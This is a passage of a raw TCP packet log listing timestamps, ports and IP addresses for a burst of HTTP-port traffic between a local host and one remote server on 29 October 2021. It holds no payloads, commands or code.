Oct 29, 2021 20:50:02.290340900 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290426970 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.290492058 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.290560007 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290579081 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290595055 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290622950 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.290628910 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290668964 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290679932 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.290729046 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290746927 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290760994 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290766954 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.290780067 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290801048 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290808916 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.290831089 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290834904 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.290848017 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290883064 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.290898085 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290977001 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.290993929 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.291009903 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.291027069 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.291033030 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.291043043 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.291059971 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.291069031 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.291074991 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.291095972 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.291116953 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.291119099 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.291147947 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.291208982 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292062044 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292088985 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292155027 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292161942 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292176008 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292217970 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292232037 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292233944 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292258024 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292273045 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292298079 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292346001 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292409897 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292427063 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292440891 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292459011 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292465925 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292505980 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292546034 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292563915 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292581081 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292597055 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292612076 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292613983 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292630911 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292649031 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292675972 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292695999 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292712927 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292752028 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.292769909 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292788029 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.292834044 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.343786001 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.343818903 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.343837023 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.343852997 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.343868017 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.343884945 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.343900919 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.343919039 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.343924999 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.343971014 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.343997955 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.344012976 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344047070 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344063997 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344080925 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344105959 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.344136953 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344144106 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.344157934 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344175100 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344206095 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344230890 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.344265938 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.344321012 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344338894 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344386101 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.344392061 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344518900 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344538927 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344556093 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344573021 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344589949 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344599962 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.344608068 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344626904 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.344650030 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.344676018 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.345437050 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345464945 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345495939 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345514059 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345530033 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345556021 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.345563889 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345597982 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.345629930 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.345783949 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345803022 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345832109 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345849037 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345865011 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345881939 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.345885038 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.345927954 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.345947981 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.346617937 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.346645117 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.346664906 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.346682072 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.346731901 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.346827984 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.346846104 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.346884966 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.346901894 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.346913099 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.346955061 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.347002029 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.347018003 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.347084045 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.397310019 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397344112 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397356987 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397376060 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397393942 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397416115 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397418976 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.397433043 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397450924 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397461891 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.397469044 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397488117 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.397489071 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397505999 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397524118 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397526979 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.397545099 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397551060 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.397563934 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397581100 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397598028 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397613049 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.397634983 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.397672892 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.397905111 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397929907 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397944927 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.397985935 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398001909 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.398026943 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.398060083 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398077965 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398091078 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398103952 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398225069 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.398623943 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398660898 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398678064 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398694038 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398721933 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.398770094 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.398782969 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398803949 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398818970 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398837090 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.398883104 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.398897886 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399199009 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399219036 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399230957 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399244070 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399256945 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399274111 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399288893 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399291992 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399308920 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399324894 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399327040 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399342060 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399349928 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399355888 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399369001 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399385929 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399401903 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399403095 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399416924 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399430037 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399441004 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399446964 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399462938 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399466038 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399481058 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399485111 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399502993 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399516106 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399521112 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399529934 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399544001 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399558067 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399558067 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399571896 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399581909 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399585009 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399604082 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399604082 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399624109 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399641037 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399653912 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399657965 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399676085 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399692059 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399696112 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399714947 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399713993 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399733067 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399745941 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399749994 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399766922 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399780035 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399779081 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399825096 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399840117 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399842978 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399861097 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399878025 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399921894 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.399945974 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.399965048 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400023937 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400024891 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400063992 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400372982 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400393009 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400404930 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400418997 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400432110 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400445938 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400454998 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400459051 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400473118 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400486946 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400487900 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400501013 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400512934 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400517941 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400535107 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400537968 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400556087 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400557995 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400571108 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400589943 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400687933 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400707006 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400713921 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400746107 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400794983 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400813103 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400831938 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400845051 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400876045 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400882006 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400893927 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400909901 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400913000 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.400960922 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.400991917 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401043892 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.401068926 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401087999 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401135921 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.401149035 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401169062 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401194096 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401209116 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401249886 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401279926 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401283979 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.401308060 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401320934 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401335001 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401346922 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401371956 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.401376009 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401393890 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401410103 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.401468992 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.401568890 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401598930 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401613951 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401668072 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.401772976 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401813984 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401832104 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.401851892 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.401880026 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.451735973 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.451765060 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.451783895 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.451801062 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.451915026 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.452200890 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.452224970 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.452241898 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.452259064 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.452270985 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.452318907 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.452320099 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.452337027 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.452393055 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.452925920 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.452953100 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453016043 CEST	49814	80	192.168.2.4	185.98.87.159
Oct 29, 2021 20:50:02.453031063 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453048944 CEST	80	49814	185.98.87.159	192.168.2.4
Oct 29, 2021 20:50:02.453068018 CEST	80	49814	185.98.87.159	192.168.2.4
